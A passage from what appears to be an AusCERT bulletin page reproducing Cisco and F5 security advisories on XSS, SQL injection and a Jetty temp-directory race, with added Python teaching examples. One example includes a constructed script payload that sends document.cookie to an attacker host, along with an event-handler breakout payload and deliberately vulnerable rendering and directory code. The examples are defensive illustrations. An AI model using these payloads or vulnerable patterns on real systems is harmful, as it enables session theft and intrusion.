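    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = xxe_demo()
    print("external entities resolved:", repr(leaked))
    print("external entities disabled:", repr(blocked))
```

The check a practitioner wants from this is the second value: with external general entities off, the entity reference contributes nothing to the content and the secret never reaches the application. Whatever XML library a product uses, the equivalent setting (no external entity resolution, and ideally no DTD processing at all for untrusted uploads) is the fix class for CWE-611.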
19 May 2022

ESB-2022.2450 - [Cisco] Cisco Enterprise Chat and Email: CVSS (Max): 5.4

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2022.2450
       Cisco Enterprise Chat and Email Stored Cross-Site Scripting
                               Vulnerability
                                 19 May 2022

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           Cisco Enterprise Chat and Email
Publisher:         Cisco Systems
Operating System:  Cisco
Resolution:        Patch/Upgrade
CVE Names:         CVE-2022-20802
Original Bulletin:
   https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ece-strd-xss-BqFXO9D2

Comment: CVSS (Max):  5.4 CVE-2022-20802 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)
         CVSS Source: Cisco Systems
         Calculator:  https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

- --------------------------BEGIN INCLUDED TEXT--------------------

Cisco Enterprise Chat and Email Stored Cross-Site Scripting Vulnerability

Priority:        Medium
Advisory ID:     cisco-sa-ece-strd-xss-BqFXO9D2
First Published: 2022 May 18 16:00 GMT
Version 1.0:     Final
Workarounds:     No workarounds available
Cisco Bug IDs:   CSCwa92119
CVE Names:       CVE-2022-20802
CWEs:            CWE-79

Summary

  o A vulnerability in the web interface of Cisco Enterprise Chat and Email
    (ECE) could allow an authenticated, remote attacker to conduct a cross-site
    scripting (XSS) attack against a user of the interface.

    This vulnerability is due to insufficient validation of user-supplied input
    that is processed by the web interface. An attacker could exploit this
    vulnerability by sending a crafted HTTP request to the affected system. A
    successful exploit could allow the attacker to execute arbitrary script
    code in the context of the interface or access sensitive, browser-based
    information. To successfully exploit this vulnerability, an attacker would
    need valid agent credentials.

    Cisco has released software updates that address this vulnerability. There
    are no workarounds that address this vulnerability.

    This advisory is available at the following link:
    https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ece-strd-xss-BqFXO9D2

Affected Products

  o Vulnerable Products

    At the time of publication, this vulnerability affected Cisco ECE.

    For information about which Cisco software releases were vulnerable at the
    time of publication, see the Fixed Software section of this advisory. See
    the Details section in the bug ID(s) at the top of this advisory for the
    most complete and current information.

    Products Confirmed Not Vulnerable

    Only products listed in the Vulnerable Products section of this advisory
    are known to be affected by this vulnerability.

Workarounds

  o There are no workarounds that address this vulnerability.

Fixed Software

  o When considering software upgrades, customers are advised to regularly
    consult the advisories for Cisco products, which are available from the
    Cisco Security Advisories page, to determine exposure and a complete
    upgrade solution.

    In all cases, customers should ensure that the devices to be upgraded
    contain sufficient memory and confirm that current hardware and software
    configurations will continue to be supported properly by the new release.
    If the information is not clear, customers are advised to contact the Cisco
    Technical Assistance Center (TAC) or their contracted maintenance providers.

    Fixed Releases

    At the time of publication, the release information in the following
    table(s) was accurate. See the Details section in the bug ID(s) at the top
    of this advisory for the most complete and current information.

    The left column lists Cisco software releases, and the right column
    indicates whether a release was affected by the vulnerability described in
    this advisory and which release included the fix for this vulnerability.

    Cisco ECE Software Release   First Fixed Release
    Earlier than 12.6(1) ES2     12.6(1) ES2

    The Cisco Product Security Incident Response Team (PSIRT) validates only
    the affected and fixed release information that is documented in this
    advisory.

Exploitation and Public Announcements

  o The Cisco PSIRT is not aware of any public announcements or malicious use
    of the vulnerability that is described in this advisory.

Source

  o Cisco would like to thank the security researcher Shahnawaz Shaikh for
    reporting this vulnerability.

Cisco Security Vulnerability Policy

  o To learn about Cisco security vulnerability disclosure policies and
    publications, see the Security Vulnerability Policy. This document also
    contains instructions for obtaining fixed software and receiving security
    vulnerability information from Cisco.

Related to This Advisory

  o Cross-Site Scripting

URL

  o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ece-strd-xss-BqFXO9D2

Revision History

  o +----------+---------------------------+----------+--------+--------------+
    | Version  | Description               | Section  | Status | Date         |
    +----------+---------------------------+----------+--------+--------------+
    | 1.0      | Initial public release.   | -        | Final  | 2022-MAY-18  |
    +----------+---------------------------+----------+--------+--------------+

- --------------------------END INCLUDED TEXT--------------------
=========================================================================== -----BEGIN PGP SIGNATURE----- Comment: https://auscert.org.au/gpg-key/ iQIVAwUBYoXMa8kNZI30y1K9AQjI2A/8Dw1wQWfeW1wchNvIw/ONJbuDEeYUnS0L nsbRtQNr5+Sa/jG09uqRuFbA/FAtsYPGKHmvNrubq94+ithoAHLom3pb1IHHHTIv aUvu0gFRQYS/7KOh0/lOcMrnZDHFvG3u+b+JI2F02BwwPuClnl1eGgd2FC/OWfs8 GLekS3HexH1AV4TzuzRN7rsUJ8yeeQ2NgiquYSzmjE0KIxMftoiz0H19r4dRXdgq cKirk4oUTgMQbx0x1ua4kYFU1PgHDRgJJSr6j0ljWxHKjPjIW70Y1tRED9Vbnx6r bU9LM2y7xCMpHFCTHyHSHR23MMP9o+eFMJeb6pQvGKrB3HsYsNgUC60QO1XG2eZe +jFlCDGzbg1ZSsZ8Tu6UpxYF2fTwBaCTQ/DPfM6BWbl8BkWZS+HdnR11aUV/fHYA xPUqIVKJuKlRVVVFBlYN/IGAQrcI8bRMrCTr//U0uJtnO9WX9Zad7vSaJ4zkDCx4 L5Vf6LJmAWus7o4s8okupVxXnZOVrvMCD2NSBbAwsFNsXL/qJmMYr9JtdWqau1va 9VlhCiMU8lFweQU/hSqn59ARxFbt+GIekdy2+OKxnp+rrBv548MnxmTknk5fc1Y9 UbacFySnElfkGOEpDzje1EqGTlGvpQaOlUTdHaWqfn95A6ZIwSeqllMvTu4JdDbu VRH4UOjo3gQ= =zEF1 -----END PGP SIGNATURE-----
19 May 2022

ESB-2022.2449 - [Cisco] Cisco Common Services Platform Collector: CVSS (Max): 6.1

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2022.2449
       Cisco Common Services Platform Collector Cross-Site Scripting
                             Vulnerabilities
                                 19 May 2022

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           Cisco Common Services Platform Collector
Publisher:         Cisco Systems
Operating System:  Cisco
Resolution:        Patch/Upgrade
CVE Names:         CVE-2022-20674 CVE-2022-20673 CVE-2022-20672 CVE-2022-20671
                   CVE-2022-20670 CVE-2022-20669 CVE-2022-20668 CVE-2022-20667
                   CVE-2022-20666
Original Bulletin:
   https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cspc-multi-xss-tyDFjhwb

Comment: CVSS (Max):  6.1 CVE-2022-20673 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
         CVSS Source: Cisco Systems
         Calculator:  https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

- --------------------------BEGIN INCLUDED TEXT--------------------

Cisco Common Services Platform Collector Cross-Site Scripting Vulnerabilities

Priority:        Medium
Advisory ID:     cisco-sa-cspc-multi-xss-tyDFjhwb
First Published: 2022 May 18 16:00 GMT
Version 1.0:     Final
Workarounds:     No workarounds available
Cisco Bug IDs:   CSCwa06070 CSCwa15311 CSCwa15485 CSCwa16572 CSCwa17816
                 CSCwa17857 CSCwa17997 CSCwa23535 CSCwa24820
CVE Names:       CVE-2022-20666 CVE-2022-20667 CVE-2022-20668 CVE-2022-20669
                 CVE-2022-20670 CVE-2022-20671 CVE-2022-20672 CVE-2022-20673
                 CVE-2022-20674
CWEs:            CWE-79

Summary

  o Multiple vulnerabilities in the web-based management interface of Cisco
    Common Services Platform Collector (CSPC) Software could allow an
    unauthenticated, remote attacker to conduct a cross-site scripting (XSS)
    attack against a user of the interface.

    These vulnerabilities are due to insufficient validation of user-supplied
    input by the web-based management interface. An attacker could exploit
    these vulnerabilities by persuading a user of the interface to click a
    crafted link. A successful exploit could allow the attacker to execute
    arbitrary script code in the context of the interface or access sensitive,
    browser-based information.

    Cisco has released software updates to address these vulnerabilities.
    There are no workarounds that address these vulnerabilities.

    This advisory is available at the following link:
    https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cspc-multi-xss-tyDFjhwb

Affected Products

  o Vulnerable Products

    At the time of publication, these vulnerabilities affected Cisco CSPC
    Software.

    For information about which Cisco software releases were vulnerable at the
    time of publication, see the Fixed Software section of this advisory. See
    the Details section in the bug ID(s) at the top of this advisory for the
    most complete and current information.

    Products Confirmed Not Vulnerable

    Only products listed in the Vulnerable Products section of this advisory
    are known to be affected by these vulnerabilities.

Workarounds

  o There are no workarounds that address these vulnerabilities.

Fixed Software

  o When considering software upgrades, customers are advised to regularly
    consult the advisories for Cisco products, which are available from the
    Cisco Security Advisories page, to determine exposure and a complete
    upgrade solution.

    In all cases, customers should ensure that the devices to be upgraded
    contain sufficient memory and confirm that current hardware and software
    configurations will continue to be supported properly by the new release.
    If the information is not clear, customers are advised to contact the Cisco
    Technical Assistance Center (TAC) or their contracted maintenance providers.

    Fixed Releases

    At the time of publication, the release information in the following
    table(s) was accurate.

    In the following table(s), the left column lists Cisco software releases,
    and the right column indicates whether a release is affected by the
    vulnerabilities described in this advisory and which release includes the
    fix for these vulnerabilities.

    Cisco CSPC Release   First Fixed Release
    2.9 and earlier      Migrate to a fixed release.
    2.10                 2.10.0.2

    The Cisco Product Security Incident Response Team (PSIRT) validates only
    the affected and fixed release information that is documented in this
    advisory.

Exploitation and Public Announcements

  o The Cisco PSIRT is not aware of any public announcements or malicious use
    of the vulnerabilities that are described in this advisory.

Source

  o These vulnerabilities were found by Dylan Hudson, Kanstantsin Markelau, and
    Sam Cosentino of Cisco during internal security testing.

Cisco Security Vulnerability Policy

  o To learn about Cisco security vulnerability disclosure policies and
    publications, see the Security Vulnerability Policy. This document also
    contains instructions for obtaining fixed software and receiving security
    vulnerability information from Cisco.

Related to This Advisory

  o Cross-Site Scripting

URL

  o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cspc-multi-xss-tyDFjhwb

Revision History

  o +----------+---------------------------+----------+--------+--------------+
    | Version  | Description               | Section  | Status | Date         |
    +----------+---------------------------+----------+--------+--------------+
    | 1.0      | Initial public release.   | -        | Final  | 2022-MAY-18  |
    +----------+---------------------------+----------+--------+--------------+

- --------------------------END INCLUDED TEXT--------------------
=========================================================================== -----BEGIN PGP SIGNATURE----- Comment: https://auscert.org.au/gpg-key/ iQIVAwUBYoXMWMkNZI30y1K9AQhYLg/9GQyPBUhoOd2V9JG2elkVRLFjypVbUDY5 ux9Pjzb3FrijFnDc/NniH0SG7rdCiVp+7lKknkTCp9MTVf9gET9RAJ2216rjWGGD sucPqdzONVIATc7FDcXVzJ3O1diBRq1ML68Iim1op+xtSUkRqE1UvVzEPM/6Qlfa CDC/5JCwWcjzKsY9jh6kfZpuUGfQzdoUXOSNKOb6XMZe6whNMIuDGLTZJcuZN/wj qpnczs7jfoGP6qvroQf2EQYU97fj4ttLYRMO7ZO59pMQcr6IQ0Blr5twzpDxXNU/ ZgFz7sHrVQM82J5Nv1cSKENGRhjeSiYRXiMYZar2sX0Q3ozSY1+NYmAFq/PGInFb O0LW933ElU3//dt7aYmzCqrrZqTy2UYk29BtCXxSmKUq9mZOO+gQdkfgL4cUQaVh A2nP2C7lgKMR/YPA+1vsGEfhaV8PF6yIp9m0VhsQHpng46BR1X7D6/Tv0bo35vKN RBgczleSI1HxPxGl0660kLC1ielX/qBvwqXF++yNcZHGNRkSKVLh/SIcQlFsZJSb y9l31OzwLXPAvPjaFpNSmxR8+Nj4eiVWwC8OYuGOQ3TeO6Lyj9O2PhZ8zSrqOQZk Wx4lzp1K4yc+8fMHJqwXjwZV2Cet4aqi4je594KMqZKT6OgqFF2RclqnWMbcr11E IPqwbmxbthI= =D5Rp -----END PGP SIGNATURE-----
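Both ESB-2022.2450 (stored XSS in Cisco ECE, reachable by an authenticated agent) and ESB-2022.2449 (reflected XSS in Cisco CSPC, delivered through a crafted link) come down to the same defect, CWE-79: a value supplied by a user is written into HTML without encoding for the context it lands in. The following is an added example written for this page, not code from either Cisco product, in which a minimal server-side renderer takes a query string (the reflected case) and a stored chat message (the stored case). The vulnerable version concatenates them into markup; the hardened version HTML-escapes each one, with quote=True so an attribute value cannot be closed early. A small html.parser-based checker then looks for what a browser would actually execute (a script element or an on* event-handler attribute) instead of grepping the raw text, which would give false positives on the escaped output. Payloads, element names and the attacker host are all constructed.

```python
import html
from html.parser import HTMLParser

# Constructed attacker inputs. The first is a stored chat message aimed at
# element content; the second is a query value that tries to break out of a
# quoted attribute and plant an event handler.
SCRIPT_PAYLOAD = (
    '<script>document.location="https://attacker.invalid/?c="'
    "+document.cookie</script>"
)
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'


def render_unsafe(query: str, last_message: str) -> str:
    """Vulnerable: untrusted strings are concatenated straight into markup."""
    return (
        "<h1>Results for " + query + "</h1>\n"
        '<input name="q" value="' + query + '">\n'
        '<p class="chat">' + last_message + "</p>"
    )


def render_safe(query: str, last_message: str) -> str:
    """Hardened: every untrusted value is HTML-escaped before insertion.

    html.escape(quote=True) turns & < > " and ' into character references,
    so the value can neither open a tag in element content nor terminate
    the attribute value it is placed in.
    """
    q = html.escape(query, quote=True)
    m = html.escape(last_message, quote=True)
    return (
        "<h1>Results for " + q + "</h1>\n"
        '<input name="q" value="' + q + '">\n'
        '<p class="chat">' + m + "</p>"
    )


class ActiveContentFinder(HTMLParser):
    """Records script elements and on* handler attributes as the parser
    actually sees them, i.e. after attribute values are decoded."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script element")
        for name, _value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{tag}@{name} handler")


def active_content(page: str) -> list:
    """Return the list of executable constructs found in a rendered page."""
    finder = ActiveContentFinder()
    finder.feed(page)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    unsafe = render_unsafe(ATTR_PAYLOAD, SCRIPT_PAYLOAD)
    safe = render_safe(ATTR_PAYLOAD, SCRIPT_PAYLOAD)
    print("unsafe render:", active_content(unsafe))
    print("safe render:  ", active_content(safe))
```

The point of parsing rather than pattern-matching is that the escaped page still contains the literal text onfocus= inside a decoded attribute value; only a parser can tell that it is now data, not an attribute. Output encoding per context is the fix for both advisories; input validation alone, which is what both Cisco summaries say was insufficient, does not cover every sink.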
19 May 2022

ESB-2022.2448 - [Appliance] F5 Traffix SDC: CVSS (Max): 8.6

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2022.2448
               K82896488: Cyrus SASL vulnerability CVE-2022-24407
                                 19 May 2022

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           Traffix SDC
Publisher:         F5 Networks
Operating System:  Network Appliance
Resolution:        Patch/Upgrade
CVE Names:         CVE-2022-24407
Original Bulletin:
   https://support.f5.com/csp/article/K82896488

Comment: CVSS (Max):  8.6 CVE-2022-24407 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H/E:H/RL:W/RC:C/AR:M/MAV:N/MAC:L/MPR:N/MUI:N)
         CVSS Source: F5 Networks
         Calculator:  https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H/E:H/RL:W/RC:C/AR:M/MAV:N/MAC:L/MPR:N/MUI:N

- --------------------------BEGIN INCLUDED TEXT--------------------

K82896488: Cyrus SASL vulnerability CVE-2022-24407

Original Publication Date: 19 May, 2022

Security Advisory Description

In Cyrus SASL 2.1.17 through 2.1.27 before 2.1.28, plugins/sql.c does not
escape the password for a SQL INSERT or UPDATE statement. (CVE-2022-24407)

Impact

Failure to properly escape SQL input allows an attacker to run arbitrary SQL
commands.

Security Advisory Status

F5 Product Development has assigned SDC-1811 (Traffix SDC) to this
vulnerability. To determine if your product and version have been evaluated for
this vulnerability, refer to the Applies to (see versions) box.

To determine if your release is known to be vulnerable, the components or
features that are affected by the vulnerability, and for information about
releases, point releases, or hotfixes that address the vulnerability, refer to
the following table. For more information about security advisory versioning,
refer to K51812227: Understanding security advisory versioning.

Note: After a fix is introduced for a given minor branch, that fix applies to
all subsequent maintenance and point releases for that branch, and no
additional fixes for that branch will be listed in the table. For example, when
a fix is introduced in 14.1.2.3, the fix also applies to 14.1.2.4, and all
later 14.1.x releases (14.1.3.x., 14.1.4.x). For more information, refer to
K51812227: Understanding security advisory versioning.

Additionally, software versions preceding those listed in the Applies to (see
versions) box of this article have reached the End of Technical Support (EoTS)
phase of their lifecycle and are no longer evaluated for security issues. For
more information, refer to the Security hotfixes section of K4602: Overview of
the F5 security vulnerability response policy.

+------------+------+--------------+----------+----------+------+-------------+
|            |      |Versions known|Fixes     |          |CVSSv3|Vulnerable   |
|Product     |Branch|to be         |introduced|Severity  |score^|component or |
|            |      |vulnerable^1  |in        |          |2     |feature      |
+------------+------+--------------+----------+----------+------+-------------+
|            |17.x  |None          |Not       |          |      |             |
|            |      |              |applicable|          |      |             |
|            +------+--------------+----------+          |      |             |
|            |16.x  |None          |Not       |          |      |             |
|            |      |              |applicable|          |      |             |
|            +------+--------------+----------+          |      |             |
|BIG-IP (all |15.x  |None          |Not       |Not       |None  |None         |
|modules)    |      |              |applicable|vulnerable|      |             |
|            +------+--------------+----------+          |      |             |
|            |14.x  |None          |Not       |          |      |             |
|            |      |              |applicable|          |      |             |
|            +------+--------------+----------+          |      |             |
|            |13.x  |None          |Not       |          |      |             |
|            |      |              |applicable|          |      |             |
+------------+------+--------------+----------+----------+------+-------------+
|            |8.x   |None          |Not       |          |      |             |
|BIG-IQ      |      |              |applicable|Not       |      |             |
|Centralized +------+--------------+----------+vulnerable|None  |None         |
|Management  |7.x   |None          |Not       |          |      |             |
|            |      |              |applicable|          |      |             |
+------------+------+--------------+----------+----------+------+-------------+
|F5OS-A      |1.x   |None          |Not       |Not       |None  |None         |
|            |      |              |applicable|vulnerable|      |             |
+------------+------+--------------+----------+----------+------+-------------+
|F5OS-C      |1.x   |None          |Not       |Not       |None  |None         |
|            |      |              |applicable|vulnerable|      |             |
+------------+------+--------------+----------+----------+------+-------------+
|Traffix SDC |5.x   |5.2.0         |None      |High      |8.6   |Cyrus SASL   |
|            |      |5.1.0         |          |          |      |             |
+------------+------+--------------+----------+----------+------+-------------+

^1 F5 evaluates only software versions that have not yet reached the End of
   Technical Support (EoTS) phase of their lifecycle.
^2 The CVSSv3 score link takes you to a resource outside of AskF5, and it is
   possible that the document may be removed without our knowledge.

Recommended Actions

If you are running a version listed in the Versions known to be vulnerable
column, you can eliminate this vulnerability by installing a version listed in
the Fixes introduced in column. If the Fixes introduced in column does not list
a version for your branch, then no update candidate currently exists for that
branch and F5 recommends upgrading to a version with the fix (refer to the
table).

If the Fixes introduced in column lists a version prior to the one you are
running, in the same branch, then your version should have the fix.

Mitigation

None

Supplemental Information

o K41942608: Overview of security advisory articles
o K4602: Overview of the F5 security vulnerability response policy
o K4918: Overview of the F5 critical issue hotfix policy
o K8986: F5 software lifecycle policy
o K167: Downloading software and firmware from F5
o K9970: Subscribing to email notifications regarding F5 products
o K9957: Creating a custom RSS feed to view new and updated documents

- --------------------------END INCLUDED TEXT--------------------
=========================================================================== -----BEGIN PGP SIGNATURE----- Comment: https://auscert.org.au/gpg-key/ iQIVAwUBYoXIOskNZI30y1K9AQhbpw/+L/HZOrHl16kzCcHz2sUBWOzr1lstbe5Y A8GpgodHJqG5avFuXvnw54Q4Y563WcAFbR9BOaVfvUfZVJJTJUkTuFb216HuSYrO Po63/inHJ/MX0T0bNDIy6W5+tPMUwVybT/eeIu21FkzXnyMJ6VnknlcvzKT3VeK4 Y89FJb5kxI5rsDuNzfQ2S3nSgJZJpjYGFeGG9oSwQLsTbbCXuz+IxYsZKvut6KpO VK+pnl6P1Bag+1l0+7qNVgfss3+jv3fpWHc/sDtxazlabdBqSC+dRQlkBLjGIXXj 4PzHIgR2DRGTaU5r7Vf1n3emDfDJpj5CYYvqmweSwAIkpbti2ikPliveXFysgqTB hnV9MYVahQwz6vBID5J1Ck9nIjPKdpphjzRcIS44bKJ4HbKqrjiM0KdsWIabzJJz kZuS2HkcpF8/J9+WaVWt/6K91YVrYBTTq7tNT7Qsi8JhqbxCk3dPhvTuoCa2uHnA jqp8fq/wF/lhlsxPthP999ZrdceDiym/UXzkQiUfOdNKep9x7gYBpknlqFSrZ1J/ WnqaoEq7TrswNqspuWzrcRNfvWJIEqpk7aijJ4n7ZBhQ69kD2TqJDrhzwbhcFdiK Ae7N72GwVt9Muv5t/nM7S2XRnm/I4JwnDKYlvSHBvvsiMzFd8mNonrxfzuYpC2IE HxNvq67wgJQ= =59Zp -----END PGP SIGNATURE-----
19 May 2022

ESB-2022.2447 - [Appliance] F5 Products: CVSS (Max): 7.2

ESB-2022.2447
K18484125: Eclipse Jetty vulnerability CVE-2020-27216
19 May 2022

AusCERT Security Bulletin Summary
---------------------------------
Product:           BIG-IP (all modules)
                   BIG-IQ Centralized Management
                   Traffix SDC
Publisher:         F5 Networks
Operating System:  Network Appliance
Resolution:        Patch/Upgrade
CVE Names:         CVE-2020-27216
Original Bulletin: https://support.f5.com/csp/article/K18484125

Comment: CVSS (Max): 7.2 CVE-2020-27216 (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:H)
CVSS Source: F5 Networks
Calculator: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:H

- --------------------------BEGIN INCLUDED TEXT--------------------

K18484125: Eclipse Jetty vulnerability CVE-2020-27216
Original Publication Date: 19 May, 2022

Security Advisory Description

In Eclipse Jetty versions 1.0 thru 9.4.32.v20200930, 10.0.0.alpha1 thru 10.0.0.beta2, and 11.0.0.alpha1 thru 11.0.0.beta2, on Unix-like systems, the system's temporary directory is shared between all users on that system. A co-located user can observe the process of creating a temporary subdirectory in the shared temporary directory and race to complete the creation of the temporary subdirectory. If the attacker wins the race, they will have read and write permission to the subdirectory used to unpack web applications, including their WEB-INF/lib jar files and JSP files. If any code is ever executed out of this temporary directory, this can lead to a local privilege escalation vulnerability. (CVE-2020-27216)

Impact

A successful exploit could allow an authenticated local user to escalate privileges.
Security Advisory Status

F5 Product Development has assigned ID 1070753 (BIG-IP and BIG-IQ) and IDs SDC-1576 and SDC-1578 (Traffix SDC) to this vulnerability.

To determine if your product and version have been evaluated for this vulnerability, refer to the Applies to (see versions) box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases, point releases, or hotfixes that address the vulnerability, refer to the following table. For more information about security advisory versioning, refer to K51812227: Understanding security advisory versioning.

Note: After a fix is introduced for a given minor branch, that fix applies to all subsequent maintenance and point releases for that branch, and no additional fixes for that branch will be listed in the table. For example, when a fix is introduced in 14.1.2.3, the fix also applies to 14.1.2.4 and all later 14.1.x releases (14.1.3.x, 14.1.4.x). For more information, refer to K51812227: Understanding security advisory versioning.

Additionally, software versions preceding those listed in the Applies to (see versions) box of this article have reached the End of Technical Support (EoTS) phase of their lifecycle and are no longer evaluated for security issues. For more information, refer to the Security hotfixes section of K4602: Overview of the F5 security vulnerability response policy.
Product                        Branch  Versions known to   Fixes           Severity        CVSSv3   Vulnerable component
                                       be vulnerable^1     introduced in                   score^2  or feature
BIG-IP (all modules)           17.x    17.0.0              None            High            7.2      iControl REST
                               16.x    16.0.0 - 16.1.2     None
                               15.x    15.1.0 - 15.1.5     None
                               14.x    14.1.0 - 14.1.4     None
                               13.x    None                Not applicable
BIG-IQ Centralized Management  8.x     8.0.0 - 8.2.0       None            High            7.2      Restjavad
                               7.x     7.0.0 - 7.1.0       None
F5OS-A                         1.x     None                Not applicable  Not vulnerable  None     None
F5OS-C                         1.x     None                Not applicable  Not vulnerable  None     None
Traffix SDC                    5.x     5.2.0, 5.1.0        None            High            7.0      NMS, FEP, CPF, CM, and webUI

^1 F5 evaluates only software versions that have not yet reached the End of Technical Support (EoTS) phase of their lifecycle.
^2 The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.
Recommended Actions

If you are running a version listed in the Versions known to be vulnerable column, you can eliminate this vulnerability by installing a version listed in the Fixes introduced in column. If the Fixes introduced in column does not list a version for your branch, then no update candidate currently exists for that branch and F5 recommends upgrading to a version with the fix (refer to the table). If the Fixes introduced in column lists a version prior to the one you are running, in the same branch, then your version should have the fix.

Mitigation

For BIG-IP and BIG-IQ

Until you can install a fixed version, you can use the following sections as temporary mitigations. These mitigations restrict access to iControl REST to only trusted networks or devices, thereby limiting the attack surface.

o Block iControl REST access through the self IP address
o Block iControl REST access through the management interface

Block iControl REST access through the self IP address

You can block all access to the iControl REST interface of your BIG-IP or BIG-IQ system through self IP addresses. To do so, you can change the Port Lockdown setting to Allow None for each self IP address in the system. If you must open any ports, you should use the Allow Custom option, taking care to disallow access to iControl REST. By default, iControl REST listens on TCP port 443, or on TCP port 8443 on single-NIC BIG-IP VE instances. If you modified the default port, ensure that you disallow access to the alternate port you configured.

Note: Performing this action prevents all access to the Configuration utility and iControl REST using the self IP address. These changes may also impact other services, including breaking high availability (HA) configurations.

Before you make changes to the configuration of your self IP addresses, F5 strongly recommends that you refer to the following articles:

o K17333: Overview of port lockdown behavior (12.x - 17.x)
o K39403510: Managing the port lockdown configuration on the BIG-IQ system
o K13092: Overview of securing access to the BIG-IP system
o K31003634: The Configuration utility of the Single-NIC BIG-IP Virtual Edition now defaults to TCP port 8443
o K51358480: The single-NIC BIG-IP VE may erroneously revert to the default management httpd port after a configuration reload

If you must expose port 443 on your self IP addresses and want to restrict access to specific IP ranges, you may consider using the packet filtering functionality built into the BIG-IP system. For more information, refer to the following article:

o K13383: Configuring CIDR Network Addresses for the BIG-IP packet filter

For BIG-IQ self IP addresses where port 443 is exposed, use an external packet filtering device such as the BIG-IP Advanced Firewall Manager (AFM).

Block iControl REST access through the management interface

To mitigate this vulnerability for affected F5 products, you should restrict management access to only trusted users and devices over a secure network. For more information about securing access to BIG-IP or BIG-IQ systems, refer to the following articles:

o K13092: Overview of securing access to the BIG-IP system
o K46122561: Restricting access to the management interface using network firewall rules
o K92748202: Restricting access to the BIG-IQ management interface using network firewall rules
o K69354049: Restricting access to the BIG-IP management interface for Configuration Utility and iControl REST services using iptables

Note: For BIG-IQ 7.x, secure the management interface by using an external packet filtering device such as the BIG-IP Advanced Firewall Manager (AFM).
Supplemental Information

o K41942608: Overview of security advisory articles
o K4602: Overview of the F5 security vulnerability response policy
o K4918: Overview of the F5 critical issue hotfix policy
o K8986: F5 software lifecycle policy
o K9502: BIG-IP hotfix and point release matrix
o K13123: Managing BIG-IP product hotfixes (11.x - 17.x)
o K15106: Managing BIG-IQ product hotfixes
o K15113: BIG-IQ hotfix and point release matrix
o K48955220: Installing an OPSWAT Endpoint Security update on BIG-IP APM systems (11.4.x and later)
o K167: Downloading software and firmware from F5
o K9970: Subscribing to email notifications regarding F5 products
o K9957: Creating a custom RSS feed to view new and updated documents

- --------------------------END INCLUDED TEXT--------------------
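The race described in ESB-2022.2447 above comes from two ingredients: a work-directory name a co-located user can predict, and a directory-creation call that quietly accepts a directory that already exists. The following is an added illustration in Python, not Jetty's own (Java) code; the "<app>-work" naming scheme, the per-item checks and the simulated attacker are assumptions chosen to show the pattern and its hardened counterpart side by side.

```python
"""Added illustration of the shared-temp-directory race behind CVE-2020-27216.
This is not Jetty's code: the naming scheme "<app>-work" and the checks are
assumptions chosen to show the pattern, in Python rather than Java."""
import os
import stat
import tempfile


def unsafe_workdir(base: str, app_name: str) -> str:
    """Vulnerable pattern: predictable name in a shared directory, created with a
    mkdir that silently accepts a directory that already exists.

    Any local user who guesses the name (or watches the shared directory and
    wins the race) can create it first; the application then unpacks into a
    directory the attacker owns and can write to."""
    path = os.path.join(base, f"{app_name}-work")
    os.makedirs(path, exist_ok=True)   # an attacker's directory is accepted as ours
    return path


def verify_private_dir(path: str) -> None:
    """Check that a directory is ours, is not a symlink, and is closed to others."""
    st = os.lstat(path)                # lstat: do not follow a planted symlink
    if stat.S_ISLNK(st.st_mode):
        raise PermissionError(f"{path} is a symlink")
    if not stat.S_ISDIR(st.st_mode):
        raise PermissionError(f"{path} is not a directory")
    if st.st_uid != os.geteuid():
        raise PermissionError(f"{path} is owned by uid {st.st_uid}, not by us")
    if st.st_mode & (stat.S_IRWXG | stat.S_IRWXO):
        raise PermissionError(f"{path} is group/world accessible")


def safe_workdir(base: str, app_name: str) -> str:
    """Hardened pattern: unpredictable name, created atomically with mode 0700
    (mkdtemp uses an exclusive create, so a pre-existing name is never reused),
    then re-verified before anything is unpacked into it."""
    path = tempfile.mkdtemp(prefix=f"{app_name}-work-", dir=base)
    verify_private_dir(path)
    return path


def run_demo() -> dict:
    """Simulate the attacker winning the race in a scratch directory that stands
    in for the shared /tmp, and compare both patterns."""
    with tempfile.TemporaryDirectory() as shared_tmp:
        attacker_dir = os.path.join(shared_tmp, "myapp-work")
        os.makedirs(attacker_dir)          # attacker pre-creates the predictable name
        os.chmod(attacker_dir, 0o777)      # ...and keeps it writable for themselves

        result = {}
        victim = unsafe_workdir(shared_tmp, "myapp")
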